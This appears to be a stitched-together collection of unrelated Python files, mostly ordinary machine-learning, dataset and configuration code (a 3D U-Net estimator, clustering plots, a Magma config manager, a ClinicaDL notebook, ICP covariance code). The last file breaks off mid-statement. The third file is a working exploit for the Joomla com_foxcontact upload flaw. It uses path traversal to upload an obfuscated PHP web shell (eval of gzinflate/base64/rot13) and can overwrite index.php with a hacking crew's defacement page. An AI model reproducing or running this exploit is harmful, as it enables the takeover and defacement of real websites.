# loss = tf.losses.softmax_cross_entropy(onehot_labels=onehot_labels, logits=logits)
l2_loss = tf.losses.get_regularization_loss()
loss += l2_loss
if mode == tf.estimator.ModeKeys.EVAL:
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
eval_metric_ops={
'dice': metrics.streaming_dice(
labels, class_ids, axis=(1, 2, 3)),
})
assert mode == tf.estimator.ModeKeys.TRAIN
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = params['optimizer'].minimize(loss, global_step=tf.train.get_global_step())
dice_coefficients = tf.reduce_mean(
metrics.dice(
onehot_labels,
tf.one_hot(class_ids, axis=(1, 2, 3)),
axis=0))
logging_hook = tf.train.LoggingTensorHook(
{"loss" : loss, "dice": dice_coefficients}, every_n_iter=100)
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
training_hooks=[logging_hook])
class UNet3D(tf.estimator.Estimator):
"""Three-dimensional U-Net model.
"""
def __init__(self,
n_classes,
optimizer=None,
learning_rate=None,
batchnorm=True,
model_dir=None,
config=None,
warm_start_from=None,
multi_gpu=False):
params = {
'n_classes': n_classes,
# If an instance of an optimizer is passed in, this will just
# return it.
'optimizer': (
None if optimizer is None
else get_optimizer_instance(optimizer, learning_rate)),
'batchnorm': batchnorm,
}
_model_fn = model_fn
if multi_gpu:
params['optimizer'] = TowerOptimizer(params['optimizer'])
_model_fn = replicate_model_fn(_model_fn)
super(UNet3D, self).__init__(
model_fn=_model_fn, model_dir=model_dir, params=params,
config=config, warm_start_from=warm_start_from)
|
import numpy as np
import matplotlib.pyplot as plt
import scipy.cluster.hierarchy as hac
a = np.array([[0.11, 2.5],[1.45, 0.40],
[0.3, 1.1],[0.9 , 0.8],
[0.5, 0.01],[0.1 , 0.5],
[0.6, 0.5],[2.6, 2.1],
[2.3, 3.2],[3.1, 2.2],
[3.2, 1.3]])
name='possible\n<- knee point'
yName='{}\ncluster distance'
title='Screeplot{}'
t1=['#2200CC','#D9007E','#FF6600','#FFCC00']
t2=['#ACE600','#0099CC','#8900CC','#FF0000']
t3=['#FF9900' ,'#FFFF00','#00CC01' ,'#0055CC']
fig, axes23 = plt.subplots(2, 3)
for method, axes in zip(['single','complete'], axes23):
z = hac.linkage(a, method=method)
axes[0].plot(range(1, len(z)+1), z[::-1, 2])
knee = np.diff(z[::-1, 2], 2)
axes[0].plot(range(2, len(z)), knee)
for method, axes in zip(['single','complete'], axes23):
z = hac.linkage(a, method=method)
axes[0].plot(range(1, len(z)+1), z[::-1, 2])
knee = np.diff(z[::-1, 2], 2)
axes[0].plot(range(2, len(z)), knee)
num_clust1 = knee.argmax() + 2
knee[knee.argmax()] = 0
num_clust2 = knee.argmax() + 2
axes[0].text(num_clust1, z[::-1, 2][num_clust1-1], name)
part1 = hac.fcluster(z, num_clust1, 'maxclust')
part2 = hac.fcluster(z, num_clust2, 'maxclust')
clr = t1+t2+t3
for part,ax in zip([part1, part2], axes[1:]):
for cluster in set(part):
ax.scatter(a[part==cluster,0],a[part==cluster,1],
color=clr[cluster])
m = '\n(method: {})'.format(method)
plt.setp(axes[0],title=title.format(m),xlabel='partition',
ylabel=yName.format(m))
plt.setp(axes[1], title='{} Clusters'.format(num_clust1))
plt.setp(axes[2], title='{} Clusters'.format(num_clust2))
plt.tight_layout()
plt.show()
|
# -*- coding: utf-8 -*-
import colorama # pip3 install colorama
from colorama import Fore as F
import requests as r # pip3 install requests
import argparse as arg
import os as sistema
sistema.system('' if sistema.name == '' else '')
index = r"""
"""
def arruma(url):
if url[-1] != "/":
url = url + "/"
if url[:7] != "http://" and url[:8] != "https://":
url = "http://" + url
return url
user_agent = {'User-agent': 'Mozilla/5.0'}
parser = arg.ArgumentParser(description = "Exploit by supr3m0")
parser.add_argument("--url", action='store', help = "Site alvo.", required = True)
parser.add_argument("--cid", action='store', help = "ID do plugin", required = True)
parser.add_argument("--bypass", action='store_true', help = "Troca o cid para 0 e mid para o cid inserido")
parser.add_argument("--index", action='store_true', help = "Invade em index")
parser.add_argument("--threads", action='store', type = int, default = "10", help = "Tempo para cada requisição.")
param = parser.parse_args()
print(F.GREEN + index)
print(F.GREEN + "[+] Site:" + F.WHITE + "", param.url)
print(F.GREEN + "[+] ID:" + F.WHITE + "", param.cid)
if param.bypass:
cid_bypass = "0"
else:
cid_bypass = param.cid
joomla_diretorios = ["components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php".format(cid_bypass, param.cid), "index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php".format(param.cid, cid_bypass, param.cid), "index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php".format(param.cid, cid_bypass, param.cid, param.cid), "components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php".format(cid_bypass, param.cid)]
shell = r"""<center>
<h5>Upload Form Yunkers Crew</h5>
<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>
</center>"""
diretorios = 0
if param.index:
joomla_diretorios = [letra.replace("/../../_func.php", "/../../../../index.php") for letra in joomla_diretorios]
shell = """
<html>
<head>
<meta charset="utf-8">
<title>./yc.py</title>
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet">
</head>
<body bgcolor="white">
<center><font size="5" face="Lato" color="black">Hackeado pela</font></center>
<center><font size="10" face="Lato" color="black">Yunkers Crew</font></center>
<center><font size="3" face="Lato" color="black">Supr3m0 passou aqui :/</font></center>
<center><font size="3" face="Lato" color="black">Nois ta de volta, pra alegria dos hater haha</font></center>
<center><img src="http://cdn5.colorir.com/desenhos/pintar/fantasma-classico_2.png" alt="Smiley face" height="250" width="400"></center>
<center><font size="4" face="Lato" color="black">Somos: Supr3m0, W4r1o6k, V4por, F1r3Bl00d, Pr0sex & Cooldsec</font></center>
<center><font size="4" face="Lato" color="black">Salve: Xin0x, R41d, Junin, M0nst4r & CryptonKing, Jonas sz</font></center>
</br>
<center><font size="5" face="Lato" color="black"><u>www.facebook.com/yunkers01/</u></font></center>
<iframe width="1" height="1" src="https://www.youtube.com/embed/K4xl1T_lyiM?autoplay=1&controls=0&repeat=1" frameborder="0" allowfullscreen></iframe>
</body>
</html>
"""
url = arruma(param.url)
try:
for diretorio in joomla_diretorios:
diretorios += 1
url_vuln = url + diretorio
shell_dir = url + "components/com_foxcontact/_func.php"
checa_site = r.get(url_vuln, headers=user_agent)
if '{"' in checa_site.text:
print(F.GREEN + "\n[!] " + F.WHITE + " Sending payloads {}...".format(diretorios))
envia_shell = r.post(url_vuln, data=shell, headers=user_agent)
print(F.YELLOW + "[!] "+ F.WHITE + "Response:")
print(F.CYAN + envia_shell.text)
verifica_shell = r.get(shell_dir, headers=user_agent)
if verifica_shell.status_code != 404:
print(F.GREEN + "\n[*]" + F.WHITE + " Shell succesfully uploaded!")
print(F.GREEN + "[+]" + F.WHITE + " URL : "+shell_dir)
input("press enter to continue...")
else:
print(F.RED + "[-] "+ F.WHITE + "Can't react shell : ", shell_dir)
else:
print(F.RED + "\n[-] " + F.WHITE + " Not vulnerable : {}.".format(diretorios))
except Exception as iu:
print(iu)
print(F.WHITE + "")
|
import logging
import os
from pathlib import Path
from torchvision import datasets
import datasetinsights.constants as const
from datasetinsights.storage.gcs import GCSClient
from .base import Dataset
CITYSCAPES_GCS_PATH = "data/cityscapes"
CITYSCAPES_LOCAL_PATH = "cityscapes"
ZIPFILES = [
"leftImg8bit_trainvaltest.zip",
"gtFine_trainvaltest.zip",
]
CITYSCAPES_COLOR_MAPPING = {c.id: c.color for c in datasets.Cityscapes.classes}
logger = logging.getLogger(__name__)
class Cityscapes(Dataset):
"""
Args:
data_root (str): root directory prefix of all datasets
split (str): indicate split type of the dataset (train|val|test)
Attributes:
root (str): root directory of the dataset
split (str): indicate split type of the dataset (train|val|test)
"""
def __init__(
self,
*,
data_root=const.DEFAULT_DATA_ROOT,
split="train",
transforms=None,
**kwargs,
):
self.root = os.path.join(data_root, CITYSCAPES_LOCAL_PATH)
self.split = split
self.download(CITYSCAPES_GCS_PATH)
self._cityscapes = datasets.Cityscapes(
self.root,
split=split,
mode="fine",
target_type="semantic",
transforms=transforms,
)
def __getitem__(self, index):
return self._cityscapes[index]
def __len__(self):
return len(self._cityscapes)
def download(self, cloud_path):
"""Download cityscapes dataset
Note:
The current implementation assumes a GCS cloud path.
Should we keep this method here if we want to support other cloud
storage system?
Args:
cloud_path (str): cloud path of the dataset
"""
path = Path(self.root)
path.mkdir(parents=True, exist_ok=True)
for zipfile in ZIPFILES:
localfile = os.path.join(self.root, zipfile)
if os.path.isfile(localfile):
# TODO: Check file hash to verify file integrity
logger.debug(f"File {localfile} exists. Skip download.")
continue
client = GCSClient()
object_key = os.path.join(CITYSCAPES_GCS_PATH, zipfile)
logger.debug(
f"Downloading file {localfile} from gs://{const.GCS_BUCKET}/"
f"{object_key}"
)
client.download(const.GCS_BUCKET, object_key, localfile)
|
from distutils.core import setup
setup(
name = 'pyfluidsynth3',
version = '1',
description = "Fluidsynth bindings for Python 3.",
author = 'Stefan Gfroerer',
url = 'https://github.com/tea2code/pyfluidsynth3',
packages = ['pyfluidsynth3'],
)
|
from IMLearn.learners import UnivariateGaussian, MultivariateGaussian
import numpy as np
import plotly.graph_objects as go
import matplotlib.pyplot as plt
import plotly.io as pio
pio.templates.default = "simple_white"
def test_univariate_gaussian():
# Question 1 - Draw samples and print fitted model
c = UnivariateGaussian()
true_expectation = 10
true_var = 1
sample = np.random.normal(true_expectation, true_var, size=1000)
c.fit(sample)
# Question 2 - Empirically showing sample mean is consistent
sample_size_array = np.arange(10, 1010, 10)
absolute_expectation_distances = []
for sample_size in sample_size_array:
selected_sample = sample[0:sample_size+1]
c.fit(selected_sample)
absolute_expectation_distances.append(abs(c.mu_-true_expectation))
plt.scatter(sample_size_array, absolute_expectation_distances)
plt.yticks(np.arange(0, max(absolute_expectation_distances) + 0.1, 0.1))
plt.ylim(0, max(absolute_expectation_distances)+0.1)
plt.title("Absolute Distance From Expectation Per Sample Size")
plt.xlabel("Sample Size")
plt.ylabel("Absolute Distance")
plt.show()
# Question 3 - Plotting Empirical PDF of fitted model
plt.scatter(sample, c.pdf(sample))
plt.title("Samples PDF")
plt.xlabel("Sample Value")
plt.ylabel("PDF")
plt.show()
def test_multivariate_gaussian():
# Question 4 - Draw samples and print fitted model
raise NotImplementedError()
# Question 5 - Likelihood evaluation
raise NotImplementedError()
# Question 6 - Maximum likelihood
raise NotImplementedError()
if __name__ == '__main__':
np.random.seed(0)
test_univariate_gaussian()
test_multivariate_gaussian()
|
from .task import Task
from .activity_task import ActivityTask
from .timer import Timer
from .generator import Generator
from .child_workflow import ChildWorkflow
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import abc
import contextlib
import json
import os
from typing import Any, Generic, TypeVar
import magma.configuration.events as magma_configuration_events
from google.protobuf import json_format
from magma.common import serialization_utils
from magma.configuration.exceptions import LoadConfigError
from magma.configuration.mconfigs import (
filter_configs_by_key,
unpack_mconfig_any,
)
from orc8r.protos.mconfig_pb2 import GatewayConfigs, GatewayConfigsMetadata
T = TypeVar('T')
MCONFIG_DIR = '/etc/magma'
MCONFIG_OVERRIDE_DIR = '/var/opt/magma/configs'
DEFAULT_MCONFIG_DIR = os.environ.get('MAGMA_CONFIG_LOCATION', MCONFIG_DIR)
def get_mconfig_manager():
"""
Get the mconfig manager implementation that the system is configured to
use.
Returns: MconfigManager implementation
"""
# This is stubbed out after deleting the streamed mconfig manager
return MconfigManagerImpl()
def load_service_mconfig(service: str, mconfig_struct: Any) -> Any:
"""
Utility function to load the mconfig for a specific service using the
configured mconfig manager.
"""
return get_mconfig_manager().load_service_mconfig(service, mconfig_struct)
def load_service_mconfig_as_json(service_name: str) -> Any:
"""
Loads the managed configuration from its json file stored on disk.
Args:
service_name (str): name of the service to load the config for
Returns: Loaded config value for the service as parsed json struct, not
protobuf message struct
"""
return get_mconfig_manager().load_service_mconfig_as_json(service_name)
class MconfigManager(Generic[T]):
"""
Interface for a class which handles loading and updating some cloud-
managed configuration (mconfig).
"""
@abc.abstractmethod
def load_mconfig(self) -> T:
"""
Load the managed configuration from its stored location.
Returns: Loaded mconfig
"""
pass
@abc.abstractmethod
def load_service_mconfig(
self, service_name: str,
mconfig_struct: Any,
) -> Any:
"""
Load a specific service's managed configuration.
Args:
service_name (str): name of the service to load a config for
mconfig_struct (Any): protobuf message struct of the managed config
for the service
Returns: Loaded config value for the service
"""
pass
@abc.abstractmethod
def load_mconfig_metadata(self) -> GatewayConfigsMetadata:
"""
Load the metadata of the managed configuration.
Returns: Loaded mconfig metadata
"""
pass
@abc.abstractmethod
def update_stored_mconfig(self, updated_value: str):
"""
Update the stored mconfig to the provided serialized value
Args:
updated_value: Serialized value of new mconfig value to store
"""
pass
@abc.abstractmethod
def deserialize_mconfig(
self, serialized_value: str,
allow_unknown_fields: bool = True,
) -> T:
"""
Deserialize the given string to the managed mconfig.
Args:
serialized_value:
Serialized value of a managed mconfig
allow_unknown_fields:
Set to true to suppress errors from parsing unknown fields
Returns: deserialized mconfig value
"""
pass
@abc.abstractmethod
def delete_stored_mconfig(self):
"""
Delete the stored mconfig file.
"""
pass
class MconfigManagerImpl(MconfigManager[GatewayConfigs]):
"""
Legacy mconfig manager for non-offset mconfigs
"""
MCONFIG_FILE_NAME = 'gateway.mconfig'
MCONFIG_PATH = os.path.join(MCONFIG_OVERRIDE_DIR, MCONFIG_FILE_NAME)
def load_mconfig(self) -> GatewayConfigs:
cfg_file_name = self._get_mconfig_file_path()
try:
with open(cfg_file_name, 'r', encoding='utf-8') as cfg_file:
mconfig_str = cfg_file.read()
return self.deserialize_mconfig(mconfig_str)
except (OSError, json.JSONDecodeError, json_format.ParseError) as e:
raise LoadConfigError('Error loading mconfig') from e
def load_service_mconfig(
self, service_name: str,
mconfig_struct: Any,
) -> Any:
mconfig = self.load_mconfig()
if service_name not in mconfig.configs_by_key:
raise LoadConfigError(
"Service ({}) missing in mconfig".format(service_name),
)
service_mconfig = mconfig.configs_by_key[service_name]
return unpack_mconfig_any(service_mconfig, mconfig_struct)
def load_service_mconfig_as_json(self, service_name) -> Any:
cfg_file_name = self._get_mconfig_file_path()
with open(cfg_file_name, 'r', encoding='utf-8') as f:
json_mconfig = json.load(f)
service_configs = json_mconfig.get('configsByKey', {})
service_configs.update(json_mconfig.get('configs_by_key', {}))
if service_name not in service_configs:
raise LoadConfigError(
"Service ({}) missing in mconfig".format(service_name),
)
return service_configs[service_name]
def load_mconfig_metadata(self) -> GatewayConfigsMetadata:
mconfig = self.load_mconfig()
return mconfig.metadata
def deserialize_mconfig(
self, serialized_value: str,
allow_unknown_fields: bool = True,
) -> GatewayConfigs:
# First parse as JSON in case there are types unrecognized by
# protobuf symbol database
json_mconfig = json.loads(serialized_value)
cfgs_by_key_json = json_mconfig.get('configs_by_key', {})
cfgs_by_key_json.update(json_mconfig.get('configsByKey', {}))
filtered_cfgs_by_key = filter_configs_by_key(cfgs_by_key_json)
# Set configs to filtered map, re-dump and parse
if 'configs_by_key' in json_mconfig:
json_mconfig.pop('configs_by_key')
json_mconfig['configsByKey'] = filtered_cfgs_by_key
json_mconfig_dumped = json.dumps(json_mconfig)
# Workaround for outdated protobuf library on sandcastle
if allow_unknown_fields:
return json_format.Parse(
json_mconfig_dumped,
GatewayConfigs(),
ignore_unknown_fields=True,
)
else:
return json_format.Parse(json_mconfig_dumped, GatewayConfigs())
def delete_stored_mconfig(self):
with contextlib.suppress(FileNotFoundError):
os.remove(self.MCONFIG_PATH)
magma_configuration_events.deleted_stored_mconfig()
def update_stored_mconfig(self, updated_value: str) -> GatewayConfigs:
parsed = json.loads(updated_value)
serialization_utils.write_to_file_atomically(
self.MCONFIG_PATH, json.dumps(parsed, indent=4, sort_keys=True),
)
magma_configuration_events.updated_stored_mconfig()
def _get_mconfig_file_path(self):
if os.path.isfile(self.MCONFIG_PATH):
return self.MCONFIG_PATH
else:
return os.path.join(DEFAULT_MCONFIG_DIR, self.MCONFIG_FILE_NAME)
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.5'
# jupytext_version: 1.13.3
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# %%
# Uncomment this cell if running in Google Colab
# !pip install clinicadl==0.2.1
# !curl -k https://aramislab.paris.inria.fr/files/data/databases/tuto/dataOasis.tar.gz -o dataOasis.tar.gz
# !tar xf dataOasis.tar.gz
# %% [markdown]
# # Launch a random search
# The previous section focused on a way to debug non-automated architecture
# search. However, if you have enough computational power, you may want to launch
# an automated architecture search to save your time. This is the point of the
# random search method of clinicadl.
# <div class="alert alert-block alert-info">
# <b>Non-optimal result:</b><p>
# A random search may allow to find a better performing network, however there is no guarantee that this is the best performing network.
# </div>
# This notebook relies on the synthetic data generated in the previous notebook.
# If you did not run it, uncomment the following cell to generate the
# corresponding dataset.
# %%
import os
# os.makedirs("data", exist_ok=True)
# !curl -k https://aramislab.paris.inria.fr/files/data/databases/tuto/synthetic.tar.gz -o synthetic.tar.gz
# !tar xf synthetic.tar.gz -C data
# %% [markdown]
# ## Define the hyperparameter space
# A random search is performed according to hyperparameters of the network that
# are sampled from a pre-defined space.
# For example, you may want your random network to have maximum 3
# fully-convolutional layers as you don't have enough memory to tackle more.
# This hyperparameter space is defined in a JSON file that must be written in your
# random search directory: `random_search.json`.
# The following function `generate_dict` generates a dictionnary that will be used
# to `random_search.json` for this tutorial. To accelerate the training task we
# will use a single CNN on the default region of interet, the hippocampi.
# %%
def generate_dict(mode, caps_dir, tsv_path, preprocessing):
return {
"caps_dir": caps_dir,
"tsv_path": tsv_path,
"diagnoses": ["AD", "CN"],
"preprocessing": preprocessing,
"mode": mode,
"network_type": "cnn",
"epochs": 30,
"learning_rate": [4, 6],
"n_convblocks": [1, 5], # Number of convolutional blocks
"first_conv_width": [8, 16, 32, 64], # Number of channels in the first convolutional block
"n_fcblocks": [1, 3], # Number of (fully-connected + activation) layers
"selection_threshold": [0.5, 1] # Threshold at which a region is selected if its corresponding
# balanced accuracy is higher.
}
# %% [markdown]
# In this default dictionnary we set all the arguments that are mandatory for the
# random search. Hyperparameters for which a space is not defined will
# automatically have their default value in all cases.
# Hyperparameters can be sampled in 4 different ways:
# - choice samples one element from a list (ex: `first_conv_width`),
# - uniform draws samples from a uniform distribution over the interval [min, max] (ex: `selection_threshold`),
# - exponent draws x from a uniform distribution over the interval [min, max] and return $10^{-x}$ (ex: `learning_rate`),
# - randint returns an integer in [min, max] (ex: `n_conv_blocks`).
# In the default dictionnary, the learning rate will be sampled between $10^{-4}$
# and $10^{-6}$.
# This dictionnary is written as a JSON file in the `launch_dir` of the
# random-search.
# You can define differently other hyperparameters by looking at the
# [documentation](https://clinicadl.readthedocs.io/).
# %%
import os
import json
mode = "image"
caps_dir = "data/synthetic"
tsv_path = "data/synthetic/labels_list/train"
preprocessing = "t1-linear"
os.makedirs("random_search", exist_ok=True)
default_dict = generate_dict(mode, caps_dir, tsv_path, preprocessing)
# Add some changes here
json = json.dumps(default_dict, skipkeys=True, indent=4)
with open(os.path.join("random_search", "random_search.json"), "w") as f:
f.write(json)
# %% [markdown]
# ## Train & evaluate a random network
# Based on the hyperparameter space described in `random_search.json`, you will
# now be able to train a random network. To do so the following command can be
# run:
# ```Text
# clinicadl random-search <launch_dir> <name> --n_splits <n_splits>
# ```
# where:
# - `launch_dir` is the folder in which is located `random_search.json` and your future output jobs.
# - `output_directory` is the name of the folder of the job launched.
# - `n_splits` is the number of splits in the cross-validation procedure.
# Other arguments, linked to computational resources can be specified when
# launching the random training.
# %%
!clinicadl random-search "random_search" "test" --n_splits 3 --split 0 -cpu -np 0 -v
# %% [markdown]
# A new folder `test` has been created in `launch_dir`. As for any network trained
# with ClinicaDL it is possible to evaluate its performance on a test set:
# %%
# Evaluate the network performance on the 2 test images
!clinicadl classify ./data/synthetic ./data/synthetic/labels_list/test ./random_search/test 'test' --selection_metrics "loss" -cpu
# %%
import pandas as pd
fold = 0
predictions = pd.read_csv("./random_search/test/fold-%i/cnn_classification/best_loss/test_image_level_prediction.tsv" % fold, sep="\t")
display(predictions)
metrics = pd.read_csv("./random_search/test/fold-%i/cnn_classification/best_loss/test_image_level_metrics.tsv" % fold, sep="\t")
display(metrics)
# %% [markdown]
# ## Analysis of the random network
# The architecture of the network can be retrieved from the `commandline.json`
# file in the folder corresponding to a random job.
# The architecture can be fully retrieved with 4 keys:
# - `convolutions` is a dictionnary describing each convolutional block,
# - `network_normalization` is the type of normalization layer used in covolutional blocks,
# - `n_fcblocks` is the number of fully-connected layers,
# - `dropout` is the dropout rate applied at the dropout layer.
# One convolutional block is described by the following values:
# - `in_channels` is the number of channels of the input (if set to null corresponds to the number of channels of the input data),
# - `out_channels` is the number of channels in the output of the convolutional block. It corresponds to 2 * `in_channels` except for the first channel chosen from `first_conv_width`, and if it becomes greater than `channels_limit`.
# - `n_conv` corresponds to the number of convolutions in the convolutional block,
# - `d_reduction` is the dimension reduction applied in the block.
# ### Convolutional block - example 1
# Convolutional block dictionnary:
# ```python
# {
# "in_channels": 16,
# "out_channels": 32,
# "n_conv": 2,
# "d_reduction": "MaxPooling"
# }
# ```
# (`network_normalization` is set to `InstanceNorm`)
# Corresponding architecture drawing:
# <br>
# <img src="./images/convBlock1.png" width="700">
# <br>
# ### Convolutional block - example 1
# Convolutional block dictionnary:
# ```python
# {
# "in_channels": 32,
# "out_channels": 64,
# "n_conv": 3,
# "d_reduction": "stride"
# }
# ```
# (`network_normalization` is set to `BatchNorm`)
# Corresponding architecture drawing:
# <br>
# <img src="./images/convBlock2.png" width="700">
# <br>
# A simple way to better visualize your random architecture is to construct it
# using `create_model` function from ClinicaDL. This function needs the list of
# options of the model stored in the JSON file as well as the size of the input.
# %%
# !pip install torchsummary
from clinicadl.tools.deep_learning.iotools import read_json
from clinicadl.tools.deep_learning.models import create_model
from clinicadl.tools.deep_learning.data import return_dataset, get_transforms
from torchsummary import summary
import argparse
import warnings
warnings.filterwarnings('ignore')
# Read model options
options = argparse.Namespace()
model_options = read_json(options, json_path="random_search/test/commandline.json")
model_options.gpu = True
# Find data input size
_, transformations = get_transforms(mode, not model_options.unnormalize)
dataset = return_dataset(mode, caps_dir, os.path.join(tsv_path, "AD.tsv"),
preprocessing, transformations, model_options)
input_size = dataset.size
# Create model and print summary
model = create_model(model_options, input_size)
summary(model, input_size)
|
from __init__ import *
from utils import *
import plots
def censi(dataset, sequence, scan_ref, scan_in):
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
pose_path = os.path.join(base_path, "T_censi.txt")
cov_path = os.path.join(base_path, "cov_censi.txt")
if not Param.b_cov_icp and os.path.exists(pose_path):
print(pose_path + " already exist")
return
T_gt = dataset.get_data(sequence)
pc_ref = dataset.get_pc(sequence, scan_ref)
pc_in = dataset.get_pc(sequence, scan_in)
T_init = SE3.mul(SE3.inv(T_gt[scan_ref]), T_gt[scan_in])
icp_with_cov(pc_ref, pc_in, T_init, Param.config_yaml, pose_path, cov_path)
def mc(dataset, sequence, scan_ref, scan_in):
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
path = os.path.join(base_path, "mc_" + str(Param.n_mc-1) + ".txt")
if not Param.b_cov_icp and os.path.exists(path):
print(path + " already exist")
return
T_gt = dataset.get_data(sequence)
pc_ref = dataset.get_pc(sequence, scan_ref)
pc_in = dataset.get_pc(sequence, scan_in)
T_init = SE3.mul(SE3.inv(T_gt[scan_ref]), T_gt[scan_in])
# Monte-Carlo
for n in range(Param.n_mc):
path = os.path.join(base_path, "mc_" + str(n) + ".txt")
if not Param.b_cov_icp and os.path.exists(path):
print(path + " already exist")
continue
# sample initial transformation
xi = np.hstack((np.random.normal(0, Param.cov_std_rot, 3),
np.random.normal(0, Param.cov_std_pos, 3)))
T_init_n = SE3.normalize(SE3.mul(SE3.exp(-xi), T_init)) # T = exp(xi) T_hat
icp_without_cov(pc_ref, pc_in, T_init_n, path)
def ut(dataset, sequence, scan_ref, scan_in, ut):
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
path = os.path.join(base_path, "ut_12.txt")
if not Param.b_cov_icp and os.path.exists(path):
print(path + " already exist")
return
T_gt = dataset.get_data(sequence)
pc_ref = dataset.get_pc(sequence, scan_ref)
pc_in = dataset.get_pc(sequence, scan_in)
T_init = SE3.mul(SE3.inv(T_gt[scan_ref]), T_gt[scan_in])
# sigma-points
sps = ut.sp.sigma_points(ut.Q_prior)
f_sp = os.path.join(base_path, "sp_sigma_points.txt")
np.savetxt(f_sp, sps)
# unscented transform
for n in range(13):
path = os.path.join(base_path, "ut_" + str(n) + ".txt")
if not Param.b_cov_icp and os.path.exists(path):
print(path + " already exist")
continue
T_init_n = SE3.normalize(SE3.mul(SE3.exp(sps[n]), T_init)) # T_sp = exp(xi) T_hat
icp_without_cov(pc_ref, pc_in, T_init_n, path)
def results(dataset, sequence, scan_ref, scan_in, ut_class):
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
f_metrics = os.path.join(base_path, 'metrics.p')
if not Param.b_cov_results and os.path.exists(f_metrics):
print(f_metrics + " already exists")
return
cov_path = os.path.join(base_path, "cov_censi.txt")
T_gt = dataset.get_data(sequence)
T_init = SE3.mul(SE3.inv(T_gt[scan_ref]), T_gt[scan_in])
T_mc, T_init_mc = dataset.get_mc_results(sequence, scan_ref)
T_ut, T_init_ut = dataset.get_ut_results(sequence, scan_ref)
_, _, cov_ut, cov_cross = ut_class.unscented_transform_se3(T_ut)
cov_base = np.zeros((6, 6))
for seq in dataset.sequences:
b_path = os.path.join(Param.results_path, seq)
f_base = os.path.join(b_path, 'base.p')
cov_base += 1/8*dataset.load(f_base)['cov_base']
# Monte-Carlo errors
mc_new = np.zeros((Param.n_mc, 6))
T_init_inv = SE3.inv(T_init)
for n in range(Param.n_mc):
mc_new[n] = SE3.log(SE3.mul(T_mc[n], T_init_inv)) # xi = log( T * T_hat^{-1} )
cov_mc = np.cov(mc_new.T)
mc_65_new_idxs = np.random.choice(np.arange(Param.n_mc), 65, replace=False)
mc_65_new = mc_new[mc_65_new_idxs]
cov_mc_65 = np.cov(mc_65_new.T)
data = np.genfromtxt(cov_path)
cov_censi = Param.std_sensor**2 * data[:6]
cov_prop = Param.std_sensor**2 * data[6:] + cov_ut
kl_div_censi = np.zeros((Param.n_mc, 2))
kl_div_mc_65 = np.zeros((Param.n_mc, 2))
kl_div_prop = np.zeros((Param.n_mc, 2))
kl_div_base = np.zeros((Param.n_mc, 2))
nne_censi = np.zeros((Param.n_m, 2))
nne_mc_65 = np.zeros((Param.n_m, 2))
nne_prop = np.zeros((Param.n_mc, 2))
nne_base = np.zeros((Param.n_mc, 2))
for n in range(Param.n_mc):
kl_div_censi[n] = rot_trans_kl_div(cov_mc, cov_censi)
kl_div_mc_65[n] = rot_trans_kl_div(cov_mc, cov_mc_65)
kl_div_prop[n] = rot_trans_kl_div(cov_mc, cov_prop)
kl_div_base[n] = rot_trans_kl_div(cov_mc, cov_base)
nne_censi[n] = nne_rot_trans(mc_new[n], cov_censi)
nne_mc_65[n] = nne_rot_trans(mc_new[n], cov_mc_65)
nne_prop[n] = nne_rot_trans(mc_new[n], cov_prop)
nne_base[n] = nne_rot_trans(mc_new[n], cov_base)
# get rid of worst and best quantiles
seuil_up = int(0.9*Param.n_mc)
seuil_low = Param.n_mc - seuil_up
kl_div_censi = np.sort(kl_div_censi.T).T
kl_div_mc_65 = np.sort(kl_div_mc_65.T).T
kl_div_prop = np.sort(kl_div_prop.T).T
kl_div_base = np.sort(kl_div_base.T).T
kl_div_censi = np.sum(kl_div_censi[seuil_low:seuil_up], 0)
kl_div_mc_65 = np.sum(kl_div_mc_65[seuil_low:seuil_up], 0)
kl_div_prop = np.sum(kl_div_prop[seuil_low:seuil_up], 0)
kl_div_base = np.sum(kl_div_base[seuil_low:seuil_up], 0)
nne_censi = np.sort(nne_censi.T).T
nne_mc_65 = np.sort(nne_mc_65.T).T
nne_prop = np.sort(nne_prop.T).T
nne_base = np.sort(nne_base.T).T
nne_censi = np.sum(nne_censi[seuil_low:seuil_up], 0)
nne_mc_65 = np.sum(nne_mc_65[seuil_low:seuil_up], 0)
nne_prop = np.sum(nne_prop[seuil_low:seuil_up], 0)
nne_base = np.sum(nne_base[seuil_low:seuil_up], 0)
tmp = seuil_up - seuil_low
kl_div_censi /= tmp
kl_div_mc_65 /= tmp
kl_div_prop /= tmp
kl_div_base /= tmp
nne_censi /= tmp
nne_mc_65 /= tmp
nne_prop /= tmp
nne_base /= tmp
metrics = {
